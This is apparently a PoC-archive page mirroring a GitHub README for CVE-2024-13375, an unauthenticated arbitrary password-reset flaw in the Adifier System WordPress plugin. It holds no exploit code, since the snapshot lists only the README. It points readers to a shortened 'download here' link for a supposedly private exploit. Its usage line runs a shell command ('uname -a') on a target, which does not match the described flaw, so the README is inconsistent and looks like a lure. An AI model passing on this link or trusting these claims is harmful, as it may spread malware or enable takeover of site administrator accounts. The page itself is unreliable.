Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-13375 PoC — Adifier System <= 3.1.7 - Unauthenticated Arbitrary Password Reset

Source
https://github.com/McTavishSue/CVE-2024-13375
Associated Vulnerability
Title:Adifier System <= 3.1.7 - Unauthenticated Arbitrary Password Reset (CVE-2024-13375)
Description:The Adifier System plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.1.7. This is due to the plugin not properly validating a user's identity prior to updating their details like password through the adifier_recover() function. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.
Description
CVE-2024-13375 Unverified Password Change
Readme
# CVE-2024-13375 - Unverified Password Change (CWE-620)

## Overview
The Adifier System plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.1.7. This vulnerability is due to the plugin not properly validating a user's identity prior to updating their details, including passwords, through the adifier_recover() function. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their accounts.

## Exploit:
## [Download here](https://bit.ly/3WjgS7J)
## Details
+ **CVE ID**: [CVE-2024-13375](https://nvd.nist.gov/vuln/detail/CVE-2024-13375)
+ **Published**: 01/18/2025
+ **Impact**: Confidentiality
+ **Exploit Availability**: Not public, only private.
+ **CVSS**: 9.8
## Vulnerability Description
This vulnerability allows unauthenticated attackers to change the passwords of any user account, including administrator accounts. Once an attacker changes a user's password, they can then log in as that user and have full access to their account privileges. For administrator accounts, this means complete control over the WordPress site, potentially leading to: 1. Unauthorized access to sensitive information 2. Modification or deletion of website content 3. Installation of malicious plugins or themes 4. Potential compromise of the entire web server The CVSS v3.1 base score for this vulnerability is 9.8 (Critical), with high impacts on confidentiality, integrity, and availability. The attack vector is network-based, requires no user interaction, and can be executed with low attack complexity.

## Affected Versions
Adifier System <= 3.1.7
## Running
To run exploit you need Python 3.9. Execute:
```
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

## Contact
+ **For inquiries, please contact:LeronTavish@outlook.com**
+ **Exploit** :[Download here](https://bit.ly/3WjgS7J)
File Snapshot

 [4.0K]  /data/pocs/449af39e0f095060a7ae084ac7ca98872eb636cb
└── [1.9K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →